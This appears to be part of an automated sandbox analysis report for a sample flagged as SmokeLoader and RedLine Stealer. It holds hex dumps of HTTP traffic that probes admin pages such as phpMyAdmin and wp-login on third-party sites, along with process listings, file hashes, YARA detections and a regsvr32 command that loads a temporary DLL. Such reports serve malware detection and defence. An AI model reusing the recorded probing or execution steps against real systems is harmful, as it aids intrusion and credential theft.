                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                31192.168.2.656050172.67.204.29443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                32192.168.2.6576523.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:31 UTC246OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:32 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:32 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:32 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                33192.168.2.658226172.67.204.29443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:33 UTC185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:38 UTC883INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sat, 02 Dec 2023 01:09:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closepragma: no-cacheexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate,
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                34192.168.2.6497013.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC246OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:37 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                35192.168.2.6497863.33.130.1904433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC247OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:37 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:37 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                Start time:02:06:04
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:305'152 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:838DDE728F0210F3B430417A57CADCD7
                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.2141424740.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                                Start time:02:06:14
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                Start time:02:06:35
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\fjdvfwi
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\fjdvfwi
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:305'152 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:838DDE728F0210F3B430417A57CADCD7
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2580124237.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2483457593.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2579756154.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                • Detection: 41%, ReversingLabs
                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                Start time:02:06:44
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\451C.dll
                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff775900000
                                                                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                Start time:02:06:44
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline: /s C:\Users\user\AppData\Local\Temp\451C.dll
                                                                                                                                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                Start time:02:06:45
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\4888.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\4888.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x610000
                                                                                                                                                                                                                                                                                                                File size:1'100'576 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:D26B3F28D2687A79CED195BA9899B524
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 57%, ReversingLabs
                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                                                Start time:02:06:45
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0xa10000
                                                                                                                                                                                                                                                                                                                File size:103'528 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:89D41E1CF478A3D3C2C701A27A5692B2
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2624636439.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                                Start time:02:06:45
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
